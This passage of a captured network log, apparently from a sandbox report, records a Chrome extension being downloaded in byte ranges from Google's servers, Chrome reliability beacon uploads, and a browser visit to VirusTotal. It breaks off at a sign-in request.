                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 1120-2811/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=2812-6305
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 3494
                                                                                                                                                                      x-request-id: 69b49f50-1ac3-4c24-900c-895deda4057a
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44518
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 2812-6305/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=6306-13782
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 7477
                                                                                                                                                                      x-request-id: c0165d09-611e-4741-a3b8-d243d8364d1a
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44519
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 6306-13782/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=13783-30906
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 17124
                                                                                                                                                                      x-request-id: fd6149fd-6454-4a45-be4e-d545122facfc
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44522
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 13783-30906/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                      coprocessor-response: download-server
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=30907-62823
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 31917
                                                                                                                                                                      x-request-id: 3f0434f2-55ac-47f2-805d-202edbf11261
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44523
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 30907-62823/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                      coprocessor-response: download-server
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=62824-129469
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 66646
                                                                                                                                                                      x-request-id: 5611abe4-99cd-44ff-8f91-d388fc9a184b
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44525
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 62824-129469/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                      coprocessor-response: download-server
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=129470-211354
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 81885
                                                                                                                                                                      x-request-id: 38998816-cfb7-4843-b418-a23ffd4d1da4
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44526
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 129470-211354/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=211355-519078
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 206 Partial Content
                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                      content-disposition: attachment
                                                                                                                                                                      content-security-policy: default-src 'none'
                                                                                                                                                                      server: Google-Edge-Cache
                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                      x-xss-protection: 0
                                                                                                                                                                      content-length: 307724
                                                                                                                                                                      x-request-id: 1e57a1db-466a-4784-b521-3c86ba3bc406
                                                                                                                                                                      date: Mon, 09 Jan 2023 00:27:55 GMT
                                                                                                                                                                      age: 44527
                                                                                                                                                                      last-modified: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      etag: "2e2fe7"
                                                                                                                                                                      content-type: application/x-chrome-extension
                                                                                                                                                                      content-range: bytes 211355-519078/6760942
                                                                                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000
                                                                                                                                                                      cache-control: public,max-age=86400
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.104.35.123:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET /edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx HTTP/1.1
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Accept: */*
                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                      If-Unmodified-Since: Wed, 10 Oct 2018 17:49:21 GMT
                                                                                                                                                                      Range: bytes=519079-863642
                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                      Host: edgedl.me.gvt1.com
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://beacons.gcp.gvt2.com/domainreliability/upload
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      216.58.208.99:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /domainreliability/upload HTTP/2.0
                                                                                                                                                                      host: beacons.gcp.gvt2.com
                                                                                                                                                                      content-length: 4860
                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://beacons.gcp.gvt2.com/domainreliability/upload
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      216.58.208.99:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /domainreliability/upload HTTP/2.0
                                                                                                                                                                      host: beacons.gcp.gvt2.com
                                                                                                                                                                      content-length: 278
                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://e2c19.gcp.gvt2.com/nel/
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.65.65.90:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /nel/ HTTP/2.0
                                                                                                                                                                      host: e2c19.gcp.gvt2.com
                                                                                                                                                                      content-length: 278
                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 204
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:50:12 GMT
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://beacons.gvt2.com/domainreliability/upload
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      142.251.36.35:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /domainreliability/upload HTTP/2.0
                                                                                                                                                                      host: beacons.gvt2.com
                                                                                                                                                                      content-length: 278
                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://e2cs09.gcp.gvt2.com/nel/
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      34.101.85.36:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /nel/ HTTP/2.0
                                                                                                                                                                      host: e2cs09.gcp.gvt2.com
                                                                                                                                                                      content-length: 278
                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/2.0 204
                                                                                                                                                                      date: Mon, 09 Jan 2023 12:50:14 GMT
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      http://virustotal.com/
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      216.239.34.21:80
                                                                                                                                                                      Request
                                                                                                                                                                      GET / HTTP/1.1
                                                                                                                                                                      Host: virustotal.com
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                      Response
                                                                                                                                                                      HTTP/1.1 302 Found
                                                                                                                                                                      Location: https://virustotal.com/
                                                                                                                                                                      X-Cloud-Trace-Context: 96bb483791e2adb01265df5283d06dd0
                                                                                                                                                                      Date: Mon, 09 Jan 2023 12:50:14 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Server: Google Frontend
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://beacons2.gvt2.com/domainreliability/upload
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      172.217.169.99:443
                                                                                                                                                                      Request
                                                                                                                                                                      POST /domainreliability/upload HTTP/2.0
                                                                                                                                                                      host: beacons2.gvt2.com
                                                                                                                                                                      content-length: 278
                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://virustotal.com/
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      216.239.34.21:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET / HTTP/2.0
                                                                                                                                                                      host: virustotal.com
                                                                                                                                                                      upgrade-insecure-requests: 1
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: navigate
                                                                                                                                                                      sec-fetch-user: ?1
                                                                                                                                                                      sec-fetch-dest: document
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/ HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      upgrade-insecure-requests: 1
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                      sec-fetch-site: none
                                                                                                                                                                      sec-fetch-mode: navigate
                                                                                                                                                                      sec-fetch-user: ?1
                                                                                                                                                                      sec-fetch-dest: document
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/static/fonts/iosevka-regular.woff2
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/static/fonts/iosevka-regular.woff2 HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      origin: https://www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: font
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/static/fonts/googlesans-regular.ttf
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/static/fonts/googlesans-regular.ttf HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      origin: https://www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: cors
                                                                                                                                                                      sec-fetch-dest: font
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/main.46e78b391f917115852c.js
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/main.46e78b391f917115852c.js HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: */*
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: script
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/images/logo.svg
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/images/logo.svg HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      GET
                                                                                                                                                                      https://www.virustotal.com/gui/images/omnibar/vt_logo.svg
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
                                                                                                                                                                      74.125.34.46:443
                                                                                                                                                                      Request
                                                                                                                                                                      GET /gui/images/omnibar/vt_logo.svg HTTP/2.0
                                                                                                                                                                      host: www.virustotal.com
                                                                                                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
                                                                                                                                                                      accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                      sec-fetch-site: same-origin
                                                                                                                                                                      sec-fetch-mode: no-cors
                                                                                                                                                                      sec-fetch-dest: image
                                                                                                                                                                      referer: https://www.virustotal.com/
                                                                                                                                                                      accept-encoding: gzip, deflate, br
                                                                                                                                                                      accept-language: en-US,en;q=0.9
                                                                                                                                                                    • flag-unknown
                                                                                                                                                                      POST
                                                                                                                                                                      https://www.virustotal.com/ui/signin
                                                                                                                                                                      chrome.exe
                                                                                                                                                                      Remote address:
